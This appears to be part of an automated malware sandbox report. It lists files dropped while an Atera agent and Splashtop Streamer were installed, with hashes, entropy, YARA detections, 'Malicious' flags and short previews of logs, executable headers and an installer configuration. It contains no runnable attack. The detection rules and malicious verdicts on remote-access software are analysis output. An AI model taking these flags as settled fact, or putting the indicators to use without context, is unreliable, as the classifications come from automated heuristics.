                                                                                                                                                                                                                                                                                                                                  MD5:3ACB1521F5343BA0FDE24DD75771779D
                                                                                                                                                                                                                                                                                                                                  SHA1:DE9CD250DE1FB2AC8E6A68E070C8930C1AA67E5F
                                                                                                                                                                                                                                                                                                                                  SHA-256:C57C8E28DF888B8D55BDAD806BD200698C9F7E51E61A5365EB5C2B0EF3FD3E48
                                                                                                                                                                                                                                                                                                                                  SHA-512:1894D2697CDF2A4436BD52A1B89AD1B97D132F0F27673EB6909034DAA6E85244AE16790F38E1C616158B2298514CDA04C1646C345D1E4A4812E6A1C8DC13CB3A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\Microsoft_.NET_Runtime_-_6.0.35_(x64)_20241030183126_001_dotnet_hostfxr_6.0.35_win_x64.msi.log, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:..=.=.=. .V.e.r.b.o.s.e. .l.o.g.g.i.n.g. .s.t.a.r.t.e.d.:. .3.0./.1.0./.2.0.2.4. . .1.8.:.3.1.:.4.3. . .B.u.i.l.d. .t.y.p.e.:. .S.H.I.P. .U.N.I.C.O.D.E. .5...0.0...1.0.0.1.1...0.0. . .C.a.l.l.i.n.g. .p.r.o.c.e.s.s.:. .C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.{.2.D.C.B.8.E.5.3.-.9.D.2.7.-.4.3.F.D.-.A.A.7.8.-.0.2.8.D.5.8.1.F.E.6.E.5.}.\...b.e.\.d.o.t.n.e.t.-.r.u.n.t.i.m.e.-.6...0...3.5.-.w.i.n.-.x.6.4...e.x.e. .=.=.=.....M.S.I. .(.c.). .(.4.C.:.F.0.). .[.1.8.:.3.1.:.4.3.:.5.6.6.].:. .R.e.s.e.t.t.i.n.g. .c.a.c.h.e.d. .p.o.l.i.c.y. .v.a.l.u.e.s.....M.S.I. .(.c.). .(.4.C.:.F.0.). .[.1.8.:.3.1.:.4.3.:.5.6.6.].:. .M.a.c.h.i.n.e. .p.o.l.i.c.y. .v.a.l.u.e. .'.D.e.b.u.g.'. .i.s. .0.....M.S.I. .(.c.). .(.4.C.:.F.0.). .[.1.8.:.3.1.:.4.3.:.5.6.6.].:. .*.*.*.*.*.*.*. .R.u.n.E.n.g.i.n.e.:..... . . . . . . . . . . .*.*.*.*.*.*.*. .P.r.o.d.u.c.t.:. .C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.P.a.c.k.a.g.e. .C.a.c.h.e.\.{.E.9.1.F.8.A.C.1.-.4.9.1.7.-.4.5.5.E.-.A.A.C.A.-.B.4.0.B.1.9.3.C.7.A.6.2.}.v.4.8...1.4.0...2.1.4.5.8.\.d.
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (385), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):109420
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.7928157640437705
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:32pRXJyrLaQuAdxj42nu3CJgJiLoSqasHoGdfkoY41uRj+6SkElhFGroi1qg:3Bpj+6SkElhFGroiwg
                                                                                                                                                                                                                                                                                                                                  MD5:D7ED3BEBA708A2A694B9C98BE2FE658A
                                                                                                                                                                                                                                                                                                                                  SHA1:1A90A23F70CF8F6FA94F837B47C48C66A5AC0467
                                                                                                                                                                                                                                                                                                                                  SHA-256:74A5494594E0053E2971286A8F9CE4040D515259A1CEB6B97371846E02DF3CEA
                                                                                                                                                                                                                                                                                                                                  SHA-512:811502793DA1876958D92B2747FC39836547B2B2D6EA27E157716D92F99AD098400F4B4D62E1FEF165B827D9D90B74FAEEE1B134FD910F946B435B9FC899DEB7
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\Microsoft_.NET_Runtime_-_6.0.35_(x64)_20241030183126_002_dotnet_host_6.0.35_win_x64.msi.log, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:..=.=.=. .V.e.r.b.o.s.e. .l.o.g.g.i.n.g. .s.t.a.r.t.e.d.:. .3.0./.1.0./.2.0.2.4. . .1.8.:.3.1.:.4.4. . .B.u.i.l.d. .t.y.p.e.:. .S.H.I.P. .U.N.I.C.O.D.E. .5...0.0...1.0.0.1.1...0.0. . .C.a.l.l.i.n.g. .p.r.o.c.e.s.s.:. .C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.{.2.D.C.B.8.E.5.3.-.9.D.2.7.-.4.3.F.D.-.A.A.7.8.-.0.2.8.D.5.8.1.F.E.6.E.5.}.\...b.e.\.d.o.t.n.e.t.-.r.u.n.t.i.m.e.-.6...0...3.5.-.w.i.n.-.x.6.4...e.x.e. .=.=.=.....M.S.I. .(.c.). .(.4.C.:.7.4.). .[.1.8.:.3.1.:.4.4.:.2.0.6.].:. .R.e.s.e.t.t.i.n.g. .c.a.c.h.e.d. .p.o.l.i.c.y. .v.a.l.u.e.s.....M.S.I. .(.c.). .(.4.C.:.7.4.). .[.1.8.:.3.1.:.4.4.:.2.0.6.].:. .M.a.c.h.i.n.e. .p.o.l.i.c.y. .v.a.l.u.e. .'.D.e.b.u.g.'. .i.s. .0.....M.S.I. .(.c.). .(.4.C.:.7.4.). .[.1.8.:.3.1.:.4.4.:.2.0.6.].:. .*.*.*.*.*.*.*. .R.u.n.E.n.g.i.n.e.:..... . . . . . . . . . . .*.*.*.*.*.*.*. .P.r.o.d.u.c.t.:. .C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.P.a.c.k.a.g.e. .C.a.c.h.e.\.{.C.5.9.6.0.1.A.1.-.7.7.1.B.-.4.2.6.B.-.A.9.F.7.-.6.C.A.C.C.A.C.4.D.B.4.E.}.v.4.8...1.4.0...2.1.4.5.8.\.d.
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\Temp\unpack\PreVerCheck.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2988
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.660860648352239
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:VyP6PvzyP6Mo70yP6FyP6PapyP6Mo7FxyP6B89xyP6lyP629EyP6+yP6PyP6rLyj:VyPi7yP270yPGyPiMyP27FxyPNyPWyPA
                                                                                                                                                                                                                                                                                                                                  MD5:870F11335FA9B300CDA3A29B280C2115
                                                                                                                                                                                                                                                                                                                                  SHA1:55E59FE7B04AAEF09DE5024E1760A227B5FBD73B
                                                                                                                                                                                                                                                                                                                                  SHA-256:42443E4945FC71A8F19616B6C00CA663066A1B140FB80ECA64F03BA19563DA3B
                                                                                                                                                                                                                                                                                                                                  SHA-512:9DA01AC40A2D2B199F4907F24602FD05619212BC4667B1CFBB00FF7EE994CB5E690621295A95DFFF743BD57ABB9F6E648DE9F988192C4FD22300685D8908DB3F
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:[.P.R.E.V.E.R.C.H.E.C.K._.E.X.].[.7.4.4.0.:.7.4.4.4.].2.0.2.4.-.1.0.-.3.0. .1.8.:.3.0.:.5.1. . .S.e.t.K.e.y. .k.e.y.P.a.t.h.:.S.p.l.a.s.h.t.o.p. .R.e.m.o.t.e. .S.e.r.v.e.r. .f.a.i.l. . .E.r.r.:.0.....[.P.R.E.V.E.R.C.H.E.C.K._.E.X.].[.7.4.4.0.:.7.4.4.4.].2.0.2.4.-.1.0.-.3.0. .1.8.:.3.0.:.5.1. . .I.n.i.t. .R.e.g.P.a.t.h.:.S.p.l.a.s.h.t.o.p. .R.e.m.o.t.e. .S.e.r.v.e.r. .h.a.s. .e.r.r.o.r.,. .b.e.c.a.u.s.e. .h.a.v.e. .n.o. .P.r.o.d.u.c.t.c.o.d.e. .o.r. .U.p.g.r.a.d.e. .c.o.d.e. . .E.r.r.:.0.....[.P.R.E.V.E.R.C.H.E.C.K._.E.X.].[.7.4.4.0.:.7.4.4.4.].2.0.2.4.-.1.0.-.3.0. .1.8.:.3.0.:.5.1. . .N.o. .o.l.d. .v.e.r. .e.x.i.s.t. . .E.r.r.:.1.8.3.....[.P.R.E.V.E.R.C.H.E.C.K._.E.X.].[.7.4.4.0.:.7.4.4.4.].2.0.2.4.-.1.0.-.3.0. .1.8.:.3.0.:.5.1. . .S.e.t.K.e.y. .k.e.y.P.a.t.h.:.S.p.l.a.s.h.t.o.p. .R.e.m.o.t.e. .S.e.r.v.e.r. .f.o.r. .B.u.s.i.n.e.s.s. .f.a.i.l. . .E.r.r.:.1.8.3.....[.P.R.E.V.E.R.C.H.E.C.K._.E.X.].[.7.4.4.0.:.7.4.4.4.].2.0.2.4.-.1.0.-.3.0. .1.8.:.3.0.:.5.1. . .I.n.i.t. .R.e.g.P.a.t.h.:.S.
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (523), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1295670
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.855877763525204
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:e8fWA7V69tC7QSjhwptVbvuv5A5HZTutWRz2d4A2G5Yezc8zs1ahsOLuoj/XU3ZJ:9jAVbzjN5
                                                                                                                                                                                                                                                                                                                                  MD5:9D0DC67778EEED5C43531CEF7DB08F01
                                                                                                                                                                                                                                                                                                                                  SHA1:8439DA3B1B63C2DB8C9404A7F615FD003FEEC2A6
                                                                                                                                                                                                                                                                                                                                  SHA-256:ECC130CB1BAC62C1B89231005454A50C3417AE156326CD7B3D1FF07F285B454A
                                                                                                                                                                                                                                                                                                                                  SHA-512:442FC81003C5F7EF3CD53451CB9C6A0ED48CBEB58E0F36113CF1B08758A7755FFC4E1133CFD1F9DEB60D595F0A1B2A7EE08EFCAFB8AE850A605F42FF4595F05A
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:..=.=.=. .V.e.r.b.o.s.e. .l.o.g.g.i.n.g. .s.t.a.r.t.e.d.:. .3.0./.1.0./.2.0.2.4. . .1.8.:.3.0.:.5.1. . .B.u.i.l.d. .t.y.p.e.:. .S.H.I.P. .U.N.I.C.O.D.E. .5...0.0...1.0.0.1.1...0.0. . .C.a.l.l.i.n.g. .p.r.o.c.e.s.s.:. .C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.m.s.i.e.x.e.c...e.x.e. .=.=.=.....M.S.I. .(.c.). .(.2.4.:.3.4.). .[.1.8.:.3.0.:.5.1.:.6.3.9.].:. .R.e.s.e.t.t.i.n.g. .c.a.c.h.e.d. .p.o.l.i.c.y. .v.a.l.u.e.s.....M.S.I. .(.c.). .(.2.4.:.3.4.). .[.1.8.:.3.0.:.5.1.:.6.3.9.].:. .M.a.c.h.i.n.e. .p.o.l.i.c.y. .v.a.l.u.e. .'.D.e.b.u.g.'. .i.s. .0.....M.S.I. .(.c.). .(.2.4.:.3.4.). .[.1.8.:.3.0.:.5.1.:.6.3.9.].:. .*.*.*.*.*.*.*. .R.u.n.E.n.g.i.n.e.:..... . . . . . . . . . . .*.*.*.*.*.*.*. .P.r.o.d.u.c.t.:. .s.e.t.u.p...m.s.i..... . . . . . . . . . . .*.*.*.*.*.*.*. .A.c.t.i.o.n.:. ..... . . . . . . . . . . .*.*.*.*.*.*.*. .C.o.m.m.a.n.d.L.i.n.e.:. .*.*.*.*.*.*.*.*.*.*.....M.S.I. .(.c.). .(.2.4.:.3.4.). .[.1.8.:.3.0.:.5.1.:.6.3.9.].:. .C.l.i.e.n.t.-.s.i.d.e. .a.n.d. .U.I. .i.s. .n.o.n.e. .
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):56378536
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.946478796737553
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:786432:eB4DOC/YOGmsS/FcbNbDm87ViwLTCg2m+5iYeVhV4ASHQy6UUZwNSG3bZxE5:jDO0GVUINbD5gwLz2mu2/3YZh3bZS5
                                                                                                                                                                                                                                                                                                                                  MD5:F1356F7FBD37502B529D9BCD643FB7AB
                                                                                                                                                                                                                                                                                                                                  SHA1:35FA2B2BBA3F4E04D078F8B77C5495757144FBDD
                                                                                                                                                                                                                                                                                                                                  SHA-256:C33D039DF86870B7EE728C60B7755E6693596AD6EA9ADD4381F01A42C52877E3
                                                                                                                                                                                                                                                                                                                                  SHA-512:09A50B84F24354DCF35E01E4C7C0081A2C34A7D12957DAF7608A20A5B3EFCEEA63772AEEE4D095A7FD79BFFEC8AB84398048E7BE96CBEA9CC3BA8F2A824316EF
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\Temp\SplashtopStreamer.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4932
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.6569249799162855
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:96:k9O0JOxO2kONdONUk9XA7RNVGmLxNexNa9XAAQxNVDtxNUxNl9XANqxNVgXxNbxz:MmsPU/mUQ
                                                                                                                                                                                                                                                                                                                                  MD5:FEC9F9F527C177305C13EFC89C2D1149
                                                                                                                                                                                                                                                                                                                                  SHA1:9E512C8E546DCAB15B347628EF78FE550B89EDDF
                                                                                                                                                                                                                                                                                                                                  SHA-256:DB42743E0C79D7936C0ED755256E1369E4876ED93DECC22DA86F42874FE1EE0F
                                                                                                                                                                                                                                                                                                                                  SHA-512:1DAF00B19CED04BE56620A6F2BF80E814763FC830F0CFFF155921C81EB4024C0FA3AADCAB9D7CF62A6DAAD97D3F97655A101FFDC4CAFD83B5090ED9A62C91B45
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
Preview:
[7384]2024-10-30 18:30:48  [CUtility::OSInfo] OS 10.0(19045)  x64:1 (Last=0)
[7384]2024-10-30 18:30:48  [CUnPack::FindHeader] Name:C:\Windows\TEMP\SplashtopStreamer.exe (Last=0)
[7384]2024-10-30 18:30:48  [CUnPack::FindHeader] Sign Size:10248 (Last=0)
[7384]2024-10-30 18:30:48  [CUnPack::FindHeader] Header offset:434176 (Last=183)
[7384]2024-10-30 18:30:48  [CUnPack::UnPackFiles]  FreeSpace:180925497344 FileSize:53136896 (Last=0)
[7384]2024-10-30 18:30:48  [CUnPack::UnPackFiles] (1/5)UnPack
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\Temp\SplashtopStreamer.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2792968
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.591750102911103
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:G2L56VHEj27kAdP/tO11sYF5LGVyfqV/TyDZzsMEQw+uCf+KwBRgb1kHWAo:G2L56VHEjfA9811sYuRhAZADj+uC5bSU
                                                                                                                                                                                                                                                                                                                                  MD5:DF5EB1AF99091A902EFFA52463EDA084
                                                                                                                                                                                                                                                                                                                                  SHA1:B04578B36490A4EC0092E9A44AE6B2679670450A
                                                                                                                                                                                                                                                                                                                                  SHA-256:83EF8E362AF27279B63EF28379675A087984791E5EAF4A9272A5CB4E52DD059C
                                                                                                                                                                                                                                                                                                                                  SHA-512:663E11667EC5C6C7969CE61F90D869F3723CBD007236150478EF6DBD861DDC75CF5F96B0345319BD178CD87045DAA39A0D6CA4AF83CF8DCDB4EBE7462D3EEABD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........M.0.,.c.,.c.,.cX^.b.,.cX^.b9,.c.T.c.,.c...b.,.c...b.,.c...b.,.cX^.b.,.cX^.b.,.c.,.c.-.c.b.,.c.`c.,.c.,.c.,.c.b.,.cRich.,.c........................PE..L...P..f...............&.....n'..............0....@...........................*.....~.*...@..........................................P..@)&..........v*..(....*.x'......p........................... ...@............0...............................text...(........................... ..`.rdata..>....0......................@..@.data...4....0......................@....rsrc...@)&..P...*&..$..............@..@.reloc..x'....*..(...N*.............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\Temp\unpack\PreVerCheck.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):403976
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.913397085225153
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:ABn+r/1zHhY39LgwN7krdItd7YtjIRC67P/4HATggyTG:ABa/1zHeKbri0eC6zRggyTG
                                                                                                                                                                                                                                                                                                                                  MD5:4C534EB38F42BC64F08C33182156D8A1
                                                                                                                                                                                                                                                                                                                                  SHA1:EEBD8F8C323E50945A273F1C197E91A9BE17BBAF
                                                                                                                                                                                                                                                                                                                                  SHA-256:7FA2AA9E466E2F3B884D11984E3D68750CBCDDB033F02F8AAC4AEEF1EE02FAA1
                                                                                                                                                                                                                                                                                                                                  SHA-512:97D5182BB70E21C5C6E2D43AA62FCA5A171AED3D3AC97A623A6FC187590CE3595DDBBF8B82B969BE86EA0FED22C5447819A0F72B1304AEF1560BDFD5F0054E98
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......l...(...(...(...c...%...c......FP..>...c...?....P..)....P..9....P..0....P..f...c...%...(.......FP..n...FP..)...FP..)...(.l.)...FP..)...Rich(...................PE..L....P~f...........!...&............................................................?....@.............................T................................(..l.............................................................$.......................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.01.UPX!....
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\Temp\unpack\PreVerCheck.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1326600
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.8708551072063875
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:U1RJO1z1sYP0y5EU9dt6VpjccWjqV9JSJkj+KuZzwBMwNG7RHHsi4+uC5:UtO11sYF5LGVyfqV/TyDZzsMEQw+uC5
                                                                                                                                                                                                                                                                                                                                  MD5:72D867E8C7A84374AA72BF7FECA4334E
                                                                                                                                                                                                                                                                                                                                  SHA1:BBE4C42BEB19A1F23BFBCFC5A67164D5EA29784E
                                                                                                                                                                                                                                                                                                                                  SHA-256:17D29B81FAEA714B5A93008711D92D1329B22244A2E9F56736064CAA4FD3CD84
                                                                                                                                                                                                                                                                                                                                  SHA-512:B523DF6FFE4A51180CDF2BDA761B01A521391A6B24E081309C33C91835C19BE96015B932D527822F5837802A979A3C48F5CC111892C47C082E8BCB8F2115AC3F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........V...8P..8P..8P..;Q..8P..=Q..8P..<Q..8P.S=Q..8P.S<Q..8P.S;Q..8P..9P!.8P..9Q..8P..8P..8P.S<QV.8P.S8Q..8P.S.P..8P.S:Q..8PRich..8P................PE..L...%..e...........!...&.....0....(...:.. (...:..............................@<......v....@...........................:..!....:.@.....:..................(...6<.....................................t.:.............................................UPX0......(.............................UPX1......... (.....................@....rsrc....0....:..(..................@..............................................................................................................................................................................................................................................................................................................................................................4.01.UPX!....
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\Temp\unpack\PreVerCheck.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):341512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.896157399444813
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:M9tl9yREhb42jcvlftvY5RL2vu2K2KTYJ1EbH18sggSNOCZ174h5o1YL6yTlNhRY:M9tcu4Jlft1223K61EjNSNOWih5y38lu
                                                                                                                                                                                                                                                                                                                                  MD5:99A6A9656DA926AF8AA648D50B47DCFB
                                                                                                                                                                                                                                                                                                                                  SHA1:81DB96003BD8F63250ABC7E59FB35E0227D3F28A
                                                                                                                                                                                                                                                                                                                                  SHA-256:FDF1F9D0AF4FF8E5CBD4387D6849327E91F0EEDD1BEFE58D7DD8B6EC40E90A98
                                                                                                                                                                                                                                                                                                                                  SHA-512:16E850FDABF76A11ED4176E0FD57DAFB64FAF9551EA220D003C5A86AFF8C39AB40D66F7AC7FCC6EF71CFA7E1D6268BBC23E32AA5CF69DF58A5D05F666701F3C0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........t.....................V................................................................................Rich...........................PE..L......e...........!...&.....P.......b.......p......................................3.....@.........................lt...>...s.......p...................(..$.......................................|d..............................................UPX0....................................UPX1................................@....rsrc....P...p...D..................@......................................................................................................................................................................................................................................................................................................................................................4.01.UPX!....
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\Temp\SplashtopStreamer.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):2.9995812306460645
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:1X6AZJ:1qAX
                                                                                                                                                                                                                                                                                                                                  MD5:56884732C1B8ABCBA0A31746DF533D97
                                                                                                                                                                                                                                                                                                                                  SHA1:662FA5002ACCB46261763B57F6A772E0A2AA5DDF
                                                                                                                                                                                                                                                                                                                                  SHA-256:A6212DAAA9A377B202A9436D80AB97BC9B0050DC7E174FCD35F255B34500CFAB
                                                                                                                                                                                                                                                                                                                                  SHA-512:8D5817660238082002FB42447D3B614C5099C8C691D4D091BE54BDDC5958A854628083BCCA191E6E45C85E70A8C6DCB5D2CBB4E2A3E5D255F5695139347E539C
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:PreVerCheck.exe
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\Temp\SplashtopStreamer.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Generic INItialization configuration [REGPATH]
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1528
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.6192017888227515
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:Zem6aTKgWT8SoBz09LAjUeiKbd8fusQK5oqAeEVhqY0+c8Eo/VoijXOR+7G2eHNl:gi+Noh0dBeNbMoqvEV0Y0+bjjXD7FwNl
                                                                                                                                                                                                                                                                                                                                  MD5:FC5DE1FEA9170B61439922A367A12478
                                                                                                                                                                                                                                                                                                                                  SHA1:96941D31908B0CB49ADEABBDFCC43508F2B99B36
                                                                                                                                                                                                                                                                                                                                  SHA-256:087BA98D89B1E1366D04A909AC09D109BB80A872B6D5C38E29568DBEE5B116F1
                                                                                                                                                                                                                                                                                                                                  SHA-512:6423294E13EA896CE12E8369101CDEAF6EB467CC60A2852E5145BE12CD8EE1189A8508A59FAF504BB4BC90593F451EC09291662E6BD43438BBCAC57F2B69613B
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:[CUSTOMSETTING]..REGEXTSECT=Splashtop Remote Server for Business..INSTDRV=0x81..BASEDTYPE=1....[REGPATH]..NUM=2..REGPATH_01=Splashtop Remote Server..REGPATH_02=Splashtop Remote Server for Business....;Common..[REGISTRY]..CSRSMode=1..confirm_d=1..EnableNvFBC=@NO:0..EnableADEM=@NO:0....;STE..[REGISTRY_Splashtop Remote Server for Business]..EnableAutoUpgrade=0..CloudUserAgent=@SX:business..EnableIQSV=0..USERTRACK_NAME=@SO:SCRS00....[PREVERCHECK]..PRODUCTID={B7C5EA94-B96A-41F5-BE95-25D78B486678}..UPGRADEID={001F085C-058A-480B-AD56-2940B857C38D}..PRODUCTNAME=Splashtop Streamer..SSUNAME=PROTOIRIS00..SSUPRODUCT=SVR..COMPATIBLE_NUM=4....[PREVERCHECKREG]..REGKEYPATH_NUM=2..REGKEYPATH_MAIN=0..REGKEYPATH_0=Splashtop Remote Server,1..REGKEYPATH_1=Splashtop Remote Server for Business,0....;ST2..[COMPATIBLE_0]..PRODUCTID={2EFEAD58-3311-4B2B-9D8A-8D663581D109}..UPGRADEID={001F085C-058A-480B-AD56-2940B857C38D}..SSUNAME=PROTOIRIS00..FORCESTEMODE=0....;S4B Prodcut name with Splashtop Streamer for Busine
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\Temp\SplashtopStreamer.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 936, Title: Installation Database, Subject: Splashtop Streamer, Author: Splashtop Inc., Keywords: Installer,MSI,Database, Comments: Splashtop Streamer Installer, Create Time/Date: Fri Sep 13 17:31:18 2024, Name of Creating Application: InstallShield?2021 27, Security: 1, Template: Intel;0,1033,2052,1028,1036,1031,1040,1041,1042,1046,1049,1034, Last Saved By: Intel;2052, Revision Number: {B7C5EA94-B96A-41F5-BE95-25D78B486678}3.7.2.0;{B7C5EA94-B96A-41F5-BE95-25D78B486678}3.7.2.0;{001F085C-058A-480B-AD56-2940B857C38D}, Number of Pages: 200, Number of Characters: 1
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):53136896
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.963270308775673
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:786432:kB4DOC/YOGmsS/FcbNbDm87ViwLTCg2m+5iYeVhV4ASHQy6UUZwNSG3bZ:VDO0GVUINbD5gwLz2mu2/3YZh3bZ
                                                                                                                                                                                                                                                                                                                                  MD5:ACF51C28B5EF5F78EE2A1F6800EDF813
                                                                                                                                                                                                                                                                                                                                  SHA1:CD52386AE838919C9D2813FF6179D7EC94B45B92
                                                                                                                                                                                                                                                                                                                                  SHA-256:82D4B1E2F38A8955F870232706CCE5193CD044F37C5414FED128F5DA846957B9
                                                                                                                                                                                                                                                                                                                                  SHA-512:C9200CEEC6F81A63DE63CD1038BC3B18D98B83B8DC738A2D02A7FF295F79312A57A60D4EFE904ACC2696C4E157D722C09ECF943AF0C1257EAFA6B8D9C3655852
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
